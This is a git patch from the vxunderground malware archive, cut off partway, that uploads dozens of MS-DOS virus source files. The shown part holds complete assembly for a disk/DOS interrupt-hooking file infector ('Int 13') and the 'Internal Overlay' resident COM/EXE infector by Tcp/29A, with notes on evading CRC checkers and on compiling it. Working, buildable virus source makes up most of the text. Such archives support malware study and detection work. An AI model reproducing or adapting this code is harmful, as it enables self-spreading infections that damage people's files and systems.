From a2f096eccccce37690eaa11fce951b049ddb727e Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Tue, 12 Jan 2021 17:47:04 -0600 Subject: [PATCH] Add files via upload --- MSDOS/Virus.MSDOS.Unknown.int10.asm | 47 + MSDOS/Virus.MSDOS.Unknown.int13.asm | 310 +++++ MSDOS/Virus.MSDOS.Unknown.inter.asm | Bin 0 -> 1792 bytes MSDOS/Virus.MSDOS.Unknown.intovl.asm | 451 ++++++++ MSDOS/Virus.MSDOS.Unknown.intr1440.asm | 771 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.intr1988.asm | 805 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.intruder.asm | 710 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.intrview.asm | 82 ++ MSDOS/Virus.MSDOS.Unknown.inv-evil.asm | 331 ++++++ MSDOS/Virus.MSDOS.Unknown.inv602-r.asm | 86 ++ MSDOS/Virus.MSDOS.Unknown.invdanub.asm | 1196 ++++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.invol.asm | 563 +++++++++ MSDOS/Virus.MSDOS.Unknown.iod.asm | 350 ++++++ MSDOS/Virus.MSDOS.Unknown.ir144.asm | 123 ++ MSDOS/Virus.MSDOS.Unknown.irm_kill.asm | 295 +++++ MSDOS/Virus.MSDOS.Unknown.israeli.asm | 753 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.isreali.asm | 882 +++++++++++++++ MSDOS/Virus.MSDOS.Unknown.isreali.lst | 882 +++++++++++++++ MSDOS/Virus.MSDOS.Unknown.ital.asm | 454 ++++++++ MSDOS/Virus.MSDOS.Unknown.italiano.asm | 455 ++++++++ MSDOS/Virus.MSDOS.Unknown.itti-a.asm | 124 ++ MSDOS/Virus.MSDOS.Unknown.itti-b.asm | 96 ++ MSDOS/Virus.MSDOS.Unknown.ivdetect.asm | 143 +++ MSDOS/Virus.MSDOS.Unknown.ivkiller.asm | 479 ++++++++ MSDOS/Virus.MSDOS.Unknown.j_1808.asm | 583 ++++++++++ MSDOS/Virus.MSDOS.Unknown.j_1808.lst | 583 ++++++++++ MSDOS/Virus.MSDOS.Unknown.j_a204.asm | 977 ++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.j_sundyb.asm | 727 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.j_sundyb.lst | 727 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.jacky.asm | 1148 +++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru-b.asm | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru-b.lst | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru-s.asm | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru-s.lst | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru.asm | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jeru.lst | 794 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jerub204.asm | 977 ++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.jerus.asm | 797 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jerusal.asm | 720 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.jerusale.asm | 790 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jerusalm.asm | 797 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.jo1_11.asm | 429 +++++++ MSDOS/Virus.MSDOS.Unknown.jo_v111.asm | 429 +++++++ MSDOS/Virus.MSDOS.Unknown.john.asm | 459 ++++++++ MSDOS/Virus.MSDOS.Unknown.johnb.asm | 484 ++++++++ MSDOS/Virus.MSDOS.Unknown.joker.asm | 541 +++++++++ MSDOS/Virus.MSDOS.Unknown.joshua.asm | 484 ++++++++ MSDOS/Virus.MSDOS.Unknown.justice.asm | 335 ++++++ MSDOS/Virus.MSDOS.Unknown.k-cmos.asm | 1118 ++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.kak.txt | 71 ++ MSDOS/Virus.MSDOS.Unknown.kbm.asm | 253 +++++ MSDOS/Virus.MSDOS.Unknown.keeper.asm | 483 ++++++++ MSDOS/Virus.MSDOS.Unknown.key-fake.asm | 247 ++++ MSDOS/Virus.MSDOS.Unknown.keypress.asm | 739 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.keypress.err | 739 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.kiis.asm | 269 +++++ MSDOS/Virus.MSDOS.Unknown.kildia.asm | 541 +++++++++ MSDOS/Virus.MSDOS.Unknown.killeddi.asm | 654 +++++++++++ MSDOS/Virus.MSDOS.Unknown.kilroy.asm | 315 ++++++ MSDOS/Virus.MSDOS.Unknown.kinison.asm | 420 +++++++ MSDOS/Virus.MSDOS.Unknown.kinnison.asm | 397 +++++++ MSDOS/Virus.MSDOS.Unknown.kode4-1.asm | 94 ++ MSDOS/Virus.MSDOS.Unknown.kode4-2.asm | 185 +++ MSDOS/Virus.MSDOS.Unknown.kode4.asm | 100 ++ MSDOS/Virus.MSDOS.Unknown.kode4v2.asm | 191 ++++ MSDOS/Virus.MSDOS.Unknown.krad.pas | 137 +++ MSDOS/Virus.MSDOS.Unknown.krautfresser.asm | 110 ++ MSDOS/Virus.MSDOS.Unknown.kuku.bas | 102 ++ MSDOS/Virus.MSDOS.Unknown.lacimehc.asm | 260 +++++ MSDOS/Virus.MSDOS.Unknown.laicos.asm | 193 ++++ MSDOS/Virus.MSDOS.Unknown.lame.asm | 186 +++ MSDOS/Virus.MSDOS.Unknown.lb-349.asm | 319 ++++++ MSDOS/Virus.MSDOS.Unknown.lbrother.asm | 242 ++++ MSDOS/Virus.MSDOS.Unknown.leap.asm | 280 +++++ MSDOS/Virus.MSDOS.Unknown.leap_frg.asm | 278 +++++ MSDOS/Virus.MSDOS.Unknown.leech.asm | 498 ++++++++ MSDOS/Virus.MSDOS.Unknown.lehigh.asm | 315 ++++++ MSDOS/Virus.MSDOS.Unknown.lemming.asm | 1125 ++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.lepc.asm | 297 +++++ MSDOS/Virus.MSDOS.Unknown.leprosy-c.asm | 217 ++++ MSDOS/Virus.MSDOS.Unknown.leprosy.c | 216 ++++ MSDOS/Virus.MSDOS.Unknown.leprosyb.asm | 242 ++++ MSDOS/Virus.MSDOS.Unknown.leprosyc.asm | 297 +++++ MSDOS/Virus.MSDOS.Unknown.liana.asm | 473 ++++++++ MSDOS/Virus.MSDOS.Unknown.liberty2.asm | 1194 +++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.liberty2.lst | 1194 +++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.libertyb.asm | 1194 +++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.libertyb.lst | 1194 +++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.lisa.asm | 192 ++++ MSDOS/Virus.MSDOS.Unknown.lisbon2.asm | 331 ++++++ MSDOS/Virus.MSDOS.Unknown.little.asm | 153 +++ MSDOS/Virus.MSDOS.Unknown.lizard.asm | 626 ++++++++++ MSDOS/Virus.MSDOS.Unknown.lmd-2000.asm | 587 ++++++++++ MSDOS/Virus.MSDOS.Unknown.loader.asm | 111 ++ MSDOS/Virus.MSDOS.Unknown.locate.asm | 231 ++++ MSDOS/Virus.MSDOS.Unknown.lock.asm | 145 +++ MSDOS/Virus.MSDOS.Unknown.lockjaw.asm | 561 +++++++++ MSDOS/Virus.MSDOS.Unknown.loki1237.asm | 613 ++++++++++ MSDOS/Virus.MSDOS.Unknown.lokjawd.asm | 559 +++++++++ 99 files changed, 48627 insertions(+) create mode 100644 MSDOS/Virus.MSDOS.Unknown.int10.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.int13.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.inter.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.intovl.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.intr1440.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.intr1988.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.intruder.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.intrview.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.inv-evil.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.inv602-r.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.invdanub.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.invol.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.iod.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ir144.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.irm_kill.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.israeli.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.isreali.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.isreali.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.ital.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.italiano.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.itti-a.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.itti-b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ivdetect.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ivkiller.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.j_1808.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.j_1808.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.j_a204.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.j_sundyb.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.j_sundyb.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.jacky.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru-b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru-b.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru-s.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru-s.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jeru.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.jerub204.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jerus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jerusal.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jerusale.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jerusalm.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jo1_11.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.jo_v111.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.john.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.johnb.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.joker.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.joshua.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.justice.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.k-cmos.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kak.txt create mode 100644 MSDOS/Virus.MSDOS.Unknown.kbm.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.keeper.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.key-fake.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.keypress.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.keypress.err create mode 100644 MSDOS/Virus.MSDOS.Unknown.kiis.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kildia.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.killeddi.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kilroy.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kinison.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kinnison.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kode4-1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kode4-2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kode4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kode4v2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.krad.pas create mode 100644 MSDOS/Virus.MSDOS.Unknown.krautfresser.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.kuku.bas create mode 100644 MSDOS/Virus.MSDOS.Unknown.lacimehc.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.laicos.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lame.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lb-349.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lbrother.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leap.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leap_frg.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leech.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lehigh.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lemming.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lepc.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leprosy-c.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leprosy.c create mode 100644 MSDOS/Virus.MSDOS.Unknown.leprosyb.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.leprosyc.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.liana.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.liberty2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.liberty2.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.libertyb.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.libertyb.lst create mode 100644 MSDOS/Virus.MSDOS.Unknown.lisa.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lisbon2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.little.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lizard.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lmd-2000.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.loader.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.locate.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lock.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lockjaw.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.loki1237.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.lokjawd.asm diff --git a/MSDOS/Virus.MSDOS.Unknown.int10.asm b/MSDOS/Virus.MSDOS.Unknown.int10.asm new file mode 100644 index 00000000..f29e3bc1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.int10.asm @@ -0,0 +1,47 @@ +DOSCALL SEGMENT 'CODE' + ASSUME CS:DOSCALL,DS:DOSCALL +; +;Procedure DOSVIO(VAR: AX, BX, CX, DX: Word); +; +; Issue a DOS VIDEO I/O INT (10) with register values set by caller +; +; FRAME: ADR AX; 12 +; ADR BX; 10 +; ADR CX; 08 +; ADR DX; 06 +; ; 00 +; + PUBLIC DOSVIO +DOSVIO PROC FAR + PUSH BP ;Save current BP value + MOV BP,SP ;To address parms + MOV DI,[BP+12] ;Address of AX + MOV AX,[DI] ;Set AX value + MOV DI,[BP+10] ;Address of BX + MOV BX,[DI] ;Set BX value + MOV DI,[BP+08] ;Address of CX + MOV CX,[DI] ;Set CX value + MOV DI,[BP+06] ;Address of DX + MOV DX,[DI] ;Set DX value + + INT 10H ;Call BIOS with caller's AX, BX, CX, DX + + MOV DI,[BP+12] ;Now put them all back... + MOV [DI],AX + MOV DI,[BP+10] + MOV [DI],BX + MOV DI,[BP+08] + MOV [DI],CX + MOV DI,[BP+06] + MOV [DI],DX + + POP BP ;Restore frame pointer + RET 6 ;Return, poping 6 bytes + +DOSVIO ENDP + +DOSCALL ENDS + END + +*** CREATED 06/28/82 21:05:48 BY AMD *** + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.int13.asm b/MSDOS/Virus.MSDOS.Unknown.int13.asm new file mode 100644 index 00000000..756fc610 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.int13.asm @@ -0,0 +1,310 @@ +Code Segment + Assume CS:Code + +Old13 = 9Ch +True13 = 9Dh +Saved21 = 9Eh +Temp13 = 9Fh + +VStart: loop Next ; Virus ID +Next: push ax + mov di,13h * 4 + push di + xor bp,bp + mov ds,bp + les bx,[di] + mov di,True13 * 4 + mov [di-4],bx + mov [di-2],es + mov ah,13h + int 2Fh + push es + push bx + int 2Fh + mov es,bp + mov si,21h * 4 + pop ax + stosw + pop ax + stosw + push si + movsw + movsw + mov ah,52h + int 21h + push es + pop ds + les ax,[bx+12h] ; ax is now 0000h, i.e. ah is 0. + push word ptr es:[bp+2] + mov si,100h + mov cx,si + mov di,bp + push si + rep movs word ptr es:[di], cs:[si] + pop si + pop word ptr ds:[bx+14h] + push es + mov al, offset Continue ; Let's use it! + push ax + retf + +SavedCX dw 1 +SavedDX dw 0 +SavedBX dw 0 +SavedES dw 0 + +FileWord dw 0 + +SCX = offset SavedCX - offset VStart +SDX = offset SavedDX - offset VStart + +Continue: mov es,bp + pop di + mov al,offset Int21 ; Two times! + stosw + mov es:[di],cs + pop di + mov al,offset Int13 ; Three times! + stosw + mov es:[di],cs + + mov es,[bp+2Ch] ; This assumes SS: + mov di,bp + xchg ax,bp + dec cx +ScanEnv: repne scasb + scasb + jnz ScanEnv + scasw + push es + pop ds + mov dx,di + mov ah,3Dh + int 21h + jc NoStart + mov dx,si + xchg ax,bx + mov ah,3Fh + push ss + pop ds + int 21h + mov ah,3Eh + int 21h + + pop ax + push ss + push si + push ss + pop es + retf + +NoStart: mov ah,4Ch + int 21h + +Int13V: mov SavedBX,bx + mov SavedCX,cx + mov SavedDX,dx + mov SavedES,es + +Go13: int Old13 + jmp short RetF2 + +Int13: cmp ah,2 + jne Go13 + push ds + push si + push di + push cx + push dx + push es + push bx + push dx + int Old13 + pop dx + jc Exit13 + cmp word ptr es:[bx],00E2h + clc + jne Exit13 + mov ax,202h + mov cx,es:[bx+SCX] + mov dh,byte ptr es:[bx+SDX+1] + mov bx,0B800h + mov ds,bx + mov es,bx + mov bh,78h + int True13 + jc Exit13 + mov si,7A00h + pop bx + mov di,bx + pop es + mov cx,100h + rep movsw + jmp short Exit13_1 +Exit13: pop bx + pop es +Exit13_1: pop dx + pop cx + pop di + pop si + pop ds +RetF2: retf 2 + +Int21: cmp ah,12h + je FindNext + int Saved21 + jmp RetF2 +FindNext: int Saved21 + cmp al,0 + jnz RetF2 + push ax + push bx + push ds + push es + mov ah,2Fh + int Saved21 + push es + pop ds + mov ax,'MO' + cmp ax,[bx+17] + jne Exit1 + cmp ax,[bx+9] + je Exit1 + mov al,[bx+7] + add al,'@' + push cx + push dx + mov cx,[bx+36] + mov dx,200h + cmp cx,dx + jb Exit2 + dec cx + test ch,10b + jz Infect + cmp al,'C' + jb Exit2 + test ch,100b + jz Infect +Exit2: pop dx + pop cx +Exit1: pop es + pop ds + pop bx + pop ax + jmp RetF2 + +Infect: push si + push di + push cs + pop es + mov di,dx + lea si,[bx+8] + mov ah,':' + stosw + movsw + movsw + movsw + movsw + mov al,'.' + stosb + movsw + movsb + xor ax,ax + stosb + + mov ds,ax + mov es,ax + mov si,13h * 4 + mov di,Temp13 * 4 + + push si + push di + push es + + movsw + movsw + + mov word ptr [si-4], offset Int13V + mov [si-2], cs + + push cs + pop ds + + mov ah,3Dh + int Saved21 + xchg ax,bx + mov ax,4202h + mov cx,-1 + mov dx,cx + int Saved21 ; DX must now be zero (.COM) +Go: mov ah,3Fh + mov dl,offset FileWord + mov di,dx + neg cx ; mov cx,1 + int Saved21 + push [di-8] + push [di-6] + mov ax,4200h + xor cx,cx ; can it be inc cx ?? + xor dx,dx + int Saved21 + mov ah,3Fh + mov dx,di + mov cl,2 + int Saved21 + mov ax,[di] + pop dx + pop cx + cmp ax,00E2h + je Close + cmp ax,5A4Dh + je Close + mov ax,202h + push cx + push dx + mov bx,0B800h + mov es,bx + mov bh,78h + int True13 + lds si,[di-4] + push di + mov di,7A00h + mov cx,100h + rep movsw + pop di + mov ax,302h + pop dx + pop cx + push cx + push dx + int True13 + pop dx + pop cx + mov ax,301h + xchg cx,cs:[di-8] + xchg dx,cs:[di-6] + push cs + pop es + xor bx,bx + int True13 +Close: mov ah,3Eh + int Saved21 + + pop es + pop si + pop di + + movs word ptr es:[di], es:[si] + movs word ptr es:[di], es:[si] + + pop di + pop si + jmp Exit2 + +VName db ' Int 13' + +VEnd label byte +VLen = offset VEnd - offset VStart + +Code EndS + End VStart \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.inter.asm b/MSDOS/Virus.MSDOS.Unknown.inter.asm new file mode 100644 index 0000000000000000000000000000000000000000..74dd4a02b0e44d6abab34f559dbe73caa013a3f2 GIT binary patch literal 1792 zcmcgtO>f&U4Bgp)|G-WJdg!GXvb4Lzhe5XJ#F=e*lH7b0Jq%lR+E!rb{{Ki>Qrsk% zdz#=l3Ptjfj}((Z_3QcY`}>!#2Y7x0ZRWT0syimy>^) zCK)|oMP4JQvIHR|#beNbRgfc;Rb8WmQfXNCO=r@?>?v%y;WPkdX;N0&SlT+#M>@~L z4}kZxkXbMwg}gi}%r7bE;;3+YNx`&7g}X}%o>l0yVqc}uo-JWa-yjrb;cG?l;!;Rb z!p}Xu;jWym05Z=5R4qN0$|#6)Vu))SNTPzT+LyNTf7%u+(ZUt;Oy!OBGh_oGwkLx8 zR3M3b)`UjgyKk|*nb9UAXCPg{s2uJjXh?Gt{RSCXNwauxX+N_0lFUb0amr^#IYFgK z-FLW%@UHL=`Sy`8C7M>bTS5Uo2*f?DtGW9 z@QtSgkVj6%Re@9S$-JPMLyA-e4jeDeV6bY{hA1Ewg%yqqYW`XYNuAGqa>8o9vk0Bl z;F9MO3@h8CR>0_2-l9`Op0RX65F-kL$hhXt2>t8)(lzbeJqij9 x@H6i<7;f53VT}Am44$71Kx--wH?XEKM*bp3_(vfOl7;?vm@G(>w{QN_`U|s+XaE2J literal 0 HcmV?d00001 diff --git a/MSDOS/Virus.MSDOS.Unknown.intovl.asm b/MSDOS/Virus.MSDOS.Unknown.intovl.asm new file mode 100644 index 00000000..e7387e60 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.intovl.asm @@ -0,0 +1,451 @@ +; +; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ +; Internal Overlay ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ +; by Tcp/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ +; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ +; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ +; +; Here you have a virus i wrote some time ago... an old but still pretty +; interesting virus (anyway, ain't so old... one year or less :) Its pe- +; culiarity consists in that it infects COM and EXE files without modi- +; fying their headers! ;) In this way, it doesn't get detected under a +; very large number of CRC checkers which just compare the first bytes +; and the length of the files whose info it stores. +; +; Internal Overlay (IntOv for friends :) does this by inserting an over- +; lay loader at the entry point of the files it infects, and the corres- +; ponding overlay -the virus- at the end of the file, appended to the +; infected file in the traditional way :) +; +; It infects, as i told before, COM and EXE files on execution (4b00h) +; and opening (3dh), and it doesn't infect COMMAND.COM or EXEs with re- +; location items in the entry point, unless this item is located in off- +; set 7 (PkLited files have an item there) ;) +; +; Compiling instructions: +; +; tasm /m intov.asm +; tlink intov.obj +; exe2bin intov.exe intov.com + + +assume cs:code,ds:code,ss:code,es:code +org 0 +code segment + +_BYTES = ((end_vir-start)+(ov_part-start)+15) +_PARAG = _BYTES/16 + +start: + +delta_ofs equ word ptr $+1 + mov si,100h ; Delta offset (precalc) + ; In dropper, 100h +id_mark equ word ptr $+1 + mov cx,'<>' ; Length to search for, it will be the + ; id mark: '<>'... why not? :) +reloc_pkl equ word ptr $+1 + mov bp,0000 ; For PkLite's relocation + mov es,ds:[2ch] ; es-> environment + xor ax,ax + xor di,di + repnz scasw ; Search for two consecutive zeros + ; Searching file name + inc di + inc di ; es:di -> file name + push cs + push ds + push es + push di + push ds + + mov ax,ds + dec ax + mov es,ax ; MCB access + ; ES-> MCB + mov bx,es:[0003] + sub bx,_PARAG+1 + pop es + mov ah,4ah + int 21h ; Free memory. If resident, doesn't return! + mov ah,48h + mov bx,_PARAG + int 21h ; Want some memory + mov es,ax + push cs + pop ds + + mov cx,offset(ov_part) + push si + xor di,di + rep movsb ; Move it to reserved area + pop si + mov ax,offset(new_mcb) + push es + push ax + retf ; Jump to reserved area + +new_mcb: + push ds + pop es ; es:= old cs + pop dx + pop ds + mov ax,3d00h + int 21h ; Open the file + xchg bx,ax ; bx:=handle + push cs + pop ds +long_high equ word ptr $+1 + mov cx,0000 +long_low equ word ptr $+1 + mov dx,offset(ov_part) ; For the dropper + mov ax,4200h + int 21h ; Get set in file + ; Point to 'overlay' + mov cx,offset(end_vir) + mov ah,3fh + mov dx,offset(ov_part) + int 21h ; Read the 'overlay' + mov ah,3eh ; We're up to here in the Entry Point + +;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +;³ Now, the virus overlay part ³ +;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +ov_part: + int 21h ; Close file + push si + push si + pop di + mov si,offset(original) + mov cx,offset(ov_part) + rep movsb ; Restore original code in memory + pop si + push cs + pop ax + dec ax + mov es,ax ; es-> MCB + mov word ptr es:[0001],8 ; O.S. block + mov ax,3521h ; Get and change int 21h + int 21h + mov ofs_int21,bx + mov seg_int21,es + mov ah,25h + mov dx,offset(int_21) + int 21h +exec_host: + pop ds ; PSP + push si + xor ax,ax + xor bx,bx + xor cx,cx + xor dx,dx + xor bp,bp + xor si,si + xor di,di + push ds + pop es + retf ; jump to host + +c_com db 'COM' + db 'EXE' + db 'exe' + db 'com' + +c_21: + pushf + call dword ptr cs:[ofs_int21] + ret + +int_24: mov al,3 + iret + + db '[Internal Overlay, Tcp / 29A]' + +int_21: + cmp ah,4ah ; Can be our call + jne f_func + push ax + push di + mov ax,'<>' + sub ax,cx + shr di,1 + sub ax,di + inc ax ; If 0 -> our call + pop di + pop ax + jnz f_func + pop cx ; We're not interested in offset + pop di ; Interested in code segment + pop cx ; We're not interested in flags + pop dx + pop ds ; ds:dx -> file name + mov ax,3d00h + call c_21 ; Open file + xchg ax,bx ; bx:=handle + mov ds,di + mov cx,[si+long_high] ; Restore data + mov dx,[si+long_low] + add dx,offset(original)-offset(ov_part) + adc cx,0 + mov ax,4200h + int 21h ; Postion on overlay's portion that + ; keeps original code + mov dx,si + mov ah,3fh + mov cx,offset(ov_part) + int 21h ; We read + mov ah,3eh + int 21h ; We close the file + add [si+1],bp ; Reallocate Pklite's item (add 0 otherwise) + jmp exec_host + +f_func: + push bx + push cx + push dx + push bp + push ds + push es + push si + push di + push ax + mov di,dx + mov al,0 + mov cx,666h ;-) + repnz scasb + sub di,4 ; filename.ext + ; ^ + pop ax + push ax + cmp ax,4b00h ; file execution? + je is_exec + cmp ah,3dh ; open-file? + je check_ext +end_21: + pop ax + pop di + pop si + pop es + pop ds + pop bp + pop dx + pop cx + pop bx + db 0eah ; jmp far +ofs_int21 dw ? +seg_int21 dw ? + +check_ext: + push ds + push cs + pop ds + mov si,offset(c_com) + mov cx,4 +loop_ext: push si ; check valid extensions + push di + cmpsw + jne next_ext + cmpsb +next_ext: pop di + pop si + je ext_ok + add si,3 + loop loop_ext + pop ds + or cx,cx + jz end_21 +ext_ok: pop ds +is_exec: + cmp byte ptr ds:[di-2],'D' ; Don't infect command.com + jz end_21 + cmp byte ptr ds:[di-2],'d' + jz end_21 + mov ax,3524h ; Read and prepare int 24h + int 21h + push es + push bx + mov ah,25h + push ax ; 2524h + push ds + push dx + push cs + pop ds + mov dx,offset(int_24) + int 21h + pop dx + pop ds + mov ax,4300h + int 21h ; Get attribs + push cx + push ds + push dx + xor cx,cx + mov ax,4301h ; Reset all attribs + int 21h + jb rest_atribs + mov ax,3d02h + call c_21 ; Open the file I/O + push cs + pop ds + xchg ax,bx ; bx:=handle + mov ax,5700h + int 21h ; Get time/date + push dx + push cx + mov ah,3fh + mov dx,offset(header) + mov cx,1Ch + int 21h ; Read file header + mov ax,val_ip + mov delta_ofs,ax + xchg bp,ax ; bp:=val_ip + cmp signature,'ZM' ; EXE? + je exe + ; Assume it's a com + cmp byte ptr signature,0e9h ; jmp? + jne rest_hour + mov ax,word ptr signature+1 ; Offset jmp + add ax,3 ; Calculate file's offset + mov delta_ofs,ax + add delta_ofs,100h + xor dx,dx + xor cx,cx + jz exe&com + +rest_hour: mov ax,5701h ; Restore date/time + pop cx + pop dx + int 21h + mov ah,3eh ; We close + int 21h +rest_atribs: mov ax,4301h ; Restore attribs + pop dx + pop ds ; ds:dx -> file name + pop cx + int 21h + pop ax ; ax:=2524h + pop dx + pop ds + int 21h + jmp end_21 + +exe: + mov ax,header_size + mov cx,16 + mul cx ; ax:=header length + push ax + mov ax,val_cs + imul cx + add ax,bp ; bp:=val_ip + adc dx,0 ; dx:ax := cs:ip 